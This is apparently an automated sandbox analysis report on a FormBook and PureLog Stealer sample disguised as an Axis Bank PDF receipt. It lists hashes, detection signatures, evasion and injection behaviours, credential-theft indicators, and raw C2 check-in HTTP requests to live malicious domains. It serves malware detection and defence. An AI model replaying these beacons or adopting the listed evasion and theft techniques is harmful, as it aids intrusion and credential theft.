Windows Analysis Report
Axis Bank - 67 Account Pending Bank Receipt.pdf.exe

Overview

General Information

Sample name: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe
Analysis ID: 1417513
MD5: 801edb88d052b961f74db0f5cf66e873
SHA1: 3af01b434d362c6780807db4083bcdfc67539603
SHA256: 9172e4c414e78d7439122599ea987912ab0385b4eaece0ab86c5ccc6dd138bc7
Tags: exe

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Sigma detected: Suspicious Double Extension File Execution
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Avira: detected
Source: http://www.alpinalpes.com/i9if/ Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Avira: detection malicious, Label: HEUR/AGEN.1357693
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe ReversingLabs: Detection: 55%
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Virustotal: Detection: 53%
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe ReversingLabs: Detection: 55%
Source: Yara match File source: 10.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.4510906943.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.4523355689.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2177190183.00000000018A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2296111167.0000000002030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2178313752.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2176518453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4521932134.0000000003330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2297091636.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4521296649.0000000003100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.4521828690.0000000002D20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.4521230365.0000000003110000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Joe Sandbox ML: detected
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Joe Sandbox ML: detected
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: firefox.pdbP source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000003.2505454273.000000000873C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000000.2097797410.00000000006EE000.00000002.00000001.01000000.0000000D.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000012.00000000.2139591971.00000000006EE000.00000002.00000001.01000000.0000000D.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000015.00000000.2269120366.00000000006EE000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: wntdll.pdbUGP source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, 0000000A.00000002.2177359559.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 0000000E.00000003.2176924352.000000000317D000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000003.2178908542.0000000003327000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000002.4522293458.00000000034D0000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 0000000E.00000002.4522293458.000000000366E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000013.00000002.2297308003.000000000317E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000013.00000003.2290148261.0000000002C71000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000013.00000002.2297308003.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000013.00000003.2291974518.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: UZhG.pdb source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, OkLsTLaTTZVp.exe.0.dr
Source: Binary string: sc.pdbUGP source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, 0000000A.00000002.2176817189.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000002.4516355871.0000000000579000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000003.2115638923.000000000056B000.00000004.00000020.00020000.00000000.sdmp, OkLsTLaTTZVp.exe, 00000011.00000002.2290857995.00000000016C8000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000012.00000002.4520125236.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000012.00000003.2152244914.00000000014EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, 0000000A.00000002.2177359559.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, sc.exe, sc.exe, 0000000E.00000003.2176924352.000000000317D000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000003.2178908542.0000000003327000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000002.4522293458.00000000034D0000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 0000000E.00000002.4522293458.000000000366E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000013.00000002.2297308003.000000000317E000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000013.00000003.2290148261.0000000002C71000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000013.00000002.2297308003.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000013.00000003.2291974518.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: UZhG.pdbSHA256 source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, OkLsTLaTTZVp.exe.0.dr
Source: Binary string: sc.pdb source: Axis Bank - 67 Account Pending Bank Receipt.pdf.exe, 0000000A.00000002.2176817189.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000002.4516355871.0000000000579000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000003.2115638923.000000000056B000.00000004.00000020.00020000.00000000.sdmp, OkLsTLaTTZVp.exe, 00000011.00000002.2290857995.00000000016C8000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000012.00000002.4520125236.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000012.00000003.2152244914.00000000014EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: firefox.pdb source: sc.exe, 0000000E.00000003.2454769078.00000000080C9000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000E.00000003.2505454273.000000000873C000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\sc.exe Code function: 14_2_02B4CD50 FindFirstFileW,FindNextFileW,FindClose, 14_2_02B4CD50
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULL
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULL
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULL
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx
Source: C:\Windows\SysWOW64\sc.exe Code function: 4x nop then xor eax, eax 14_2_02B3AE20
Source: C:\Windows\SysWOW64\sc.exe Code function: 4x nop then pop edi 14_2_02B42E40
Source: C:\Windows\SysWOW64\sc.exe Code function: 4x nop then pop edi 14_2_02B42E33
Source: C:\Windows\SysWOW64\sc.exe Code function: 4x nop then pop edi 14_2_02B42E19

Networking

Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49709 -> 87.236.16.168:80
Source: Traffic Snort IDS: 2856318 ETPRO TROJAN FormBook CnC Checkin (POST) M4 192.168.2.6:49710 -> 91.195.240.19:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49710 -> 91.195.240.19:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49711 -> 91.195.240.19:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49713 -> 91.195.240.19:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49715 -> 91.195.240.19:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49716 -> 91.195.240.19:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49718 -> 91.195.240.19:80
Source: DNS query: www.heolty.xyz
Source: Joe Sandbox View IP Address: 91.195.240.117
Source: Joe Sandbox View IP Address: 162.0.238.43
Source: Joe Sandbox View ASN Name: NAMECHEAP-NETUS
Source: Joe Sandbox View ASN Name: BEGET-ASRU
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /i9if/?_jePv=4gsoUDIrCS3v/pLmX0FzYlq/S9tg3Plm5/9l2IuKYjASb4q052CqcdOmJE8iC8MjVZSDSupQ0HxlPxJrF8TgdYOevqL/nRJV/kEnhqQuCD/81+sfGb0wm4esyCJYxf1MnRk3KWQ=&ptXp=h0M4i HTTP/1.1Host: www.hardtables.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic HTTP traffic detected: GET /i9if/?_jePv=BDqqSqOapS8S5nSP+nGPXoVvWQp9N+89I0uVMcPKxM9jx1fviiEFWXWHOcelOix00UobgsDh1f2KMAIR7pbdKxVqQrde+wkrfKpy5oEwHRmU8osk850kdCSdLaNS7ZgnhT8FE9k=&ptXp=h0M4i HTTP/1.1Host: www.dreamdriss.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic HTTP traffic detected: GET /i9if/?_jePv=kVa2H3O2nLdQmb73rGUQCTSa5yO1Oqy+XW9aR7CXLuxwYhD5xJeeQjQ7DWk6H8p6eIDbLE3lGrPhyh0N4EX52tULk7gps4R5b0g5DdizlmmCmuv7/gzR090dbHsgwZGM9O5GFw4=&ptXp=h0M4i HTTP/1.1Host: www.oyoing.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic HTTP traffic detected: GET /i9if/?_jePv=J/ZdKhwjcPNgkYWK8nNQGDYuFg//K8kO+NHFlQuwj27ReMZgiTp2IAUG0r+FqwMro4SR/c8h2nO1f7KFQtw4eCL3eqkmNWTLTXuJn1PsKMMe1a8FV/6xhlSBIDnbFuoTU093ZOQ=&ptXp=h0M4i HTTP/1.1Host: www.jnkinteractive.co.krAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic HTTP traffic detected: GET /i9if/?_jePv=tBbJeeN8TFUVWDWGUYWc1zgTmv//BW6sGk5FaBPSs7ff6PU8aSBgHOOVkPyYWJzaSKff1c5UP3PXUEl6PWBMF6f8kK5BWQaUc8YsckKjWRSS0+nF7qFX4xF4ru5xnlmS00lMOtY=&ptXp=h0M4i HTTP/1.1Host: www.heolty.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic HTTP traffic detected: GET /i9if/?_jePv=Dg00GhQGstkyJZjd5CE3hNrIGIiJHx2zN+hZPwBWgO6ArtvWdTZcS41+U+aQVX8Mn9mWC51pa9o2mnVFzVEeabclG+WnZVxFmsHbFWslihDwTcFNVreDef/+ZXwtHd7qhP3rcUE=&ptXp=h0M4i HTTP/1.1Host: www.ozenmoda.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic HTTP traffic detected: GET /i9if/?_jePv=WQpp1M9K+rFf1OJm2Ljtb+HXO8heWr8a6bB0Z406amzooojk56n3Gspyyb6jLpNfB02glOZDiPlWwlPqPv0mIfZar29Xpk/b8KkhqVKtP5PW2fQt3WhQrw9GSFUE/IF33/cA9Sk=&ptXp=h0M4i HTTP/1.1Host: www.alpinalpes.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic HTTP traffic detected: GET /i9if/?_jePv=2XzH5iugp7ou8zoIweaD7kyiWHpRtbSvJxe6v6OJSMzwSGn6nVojik46NgFcZxewVOPus5v63d+DY/7m6aKSklAPkcM0O+ZyRAegSuk/msfMig5p6q7k0NKIqkLUO2tA3cSxR8M=&ptXp=h0M4i HTTP/1.1Host: www.ojaitangerines.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic HTTP traffic detected: GET /i9if/?_jePv=dvO8lz70xLwt5avcw4AAeWGZEYZWTneANh91Pw0cCa6dsDVfzCPRDy/oyS5avRt8TYifOgtb3lE5UqI+p4e+HJBhrVVijgweUYOzPYOn4yXUVaDe/viJO0CpGneTXVZl3KCNzhg=&ptXp=h0M4i HTTP/1.1Host: www.gamesun.websiteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic HTTP traffic detected: GET /i9if/?_jePv=A4KKzbBh2ZdQ7PcRTv19C8wiwe7RM/6RzfhR1JmRv8NY4gb2dUzMEyBbjBPscMMCqyAXljvwXqvOvlEmZLaTaxt0lnzAbe9OujlVsGnlz4p0yKEfaQv6TyjEUL3A57LMa+tcIMg=&ptXp=h0M4i HTTP/1.1Host: www.lucathicke.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic HTTP traffic detected: GET /i9if/?_jePv=81GtAbRv1CE0GPwuuDtMviXCZZV8X24rY9pL2EzPgW9OSIkdmi0ohJeo+nfdQPV8B0BQbyt87mHG/MblzJN+gJy40ipZdzYxx8mGTkl2DCOZDDwf28/27ZCuSZ1i1cDQR3nCO54=&ptXp=h0M4i HTTP/1.1Host: www.brandprome.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic HTTP traffic detected: GET /i9if/?_jePv=1hkwI/tMPxR4ZKMYtd4398ZYWD6ZJ3wRevAaJu7+X8hJQtTD81NNLhos/UU0hekOE22X3SYl7LAwJkDzOfiOIvlSi/BXzemdxYRKrbMbl8xHtP02JHRVmlWvlmRlAOo5ceCvuaE=&ptXp=h0M4i HTTP/1.1Host: www.cr-pos.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic HTTP traffic detected: GET /i9if/?_jePv=07tNKNHdTyhqX0xvzZZ+UT55dExqloc4SEArb/JcF37tWOUGxFSR+0+PgY6gc4vskevIRJoD8o+ONktbCT1c+AXrrou4goyYI3fp7HEXPuCUAV8/yJTZIaw5rzprO8qvcK+ybZo=&ptXp=h0M4i HTTP/1.1Host: www.rprostranstvo.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic HTTP traffic detected: GET /i9if/?_jePv=sy7lPI633m8TvfzFs0ynAvEw3up5Jg2A2dr8TRvjlNa5wVoJ5pVvpgUy1CFIKjm0dKFO/4JK3CY3m76wlp6MJfLsTPWvWPpVGMDnppjD4tav3P005f5VBIWCEn6p7MVcDGbm8L8=&ptXp=h0M4i HTTP/1.1Host: www.ruplome.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: unknown DNS traffic detected: queries for: www.hardtables.store
Source: unknown HTTP traffic detected: POST /i9if/ HTTP/1.1Host: www.dreamdriss.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Connection: closeContent-Length: 210Origin: http://www.dreamdriss.lolReferer: http://www.dreamdriss.lol/i9if/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Fri, 29 Mar 2024 13:23:28 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 280Connection: closeVary: Accept-Encoding Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.hardtables.store Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 29 Mar 2024 13:24:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://jnkinteractive.co.kr/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 29 Mar 2024 13:24:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://jnkinteractive.co.kr/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 29 Mar 2024 13:24:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://jnkinteractive.co.kr/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 29 Mar 2024 13:24:30 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 29 Mar 2024 13:24:33 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 29 Mar 2024 13:24:36 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 29 Mar 2024 13:24:39 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1238 | date: Fri, 29 Mar 2024 13:24:45 GMT | server: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1238 | date: Fri, 29 Mar 2024 13:24:47 GMT | server: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1238 | date: Fri, 29 Mar 2024 13:24:50 GMT | server: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1238 | date: Fri, 29 Mar 2024 13:24:53 GMT | server: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Server: Microsoft-IIS/10.0 | X-Powered-By: ASP.NET | Date: Fri, 29 Mar 2024 13:26:29 GMT | Connection: close | Content-Length: 103 | Data Ascii: The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
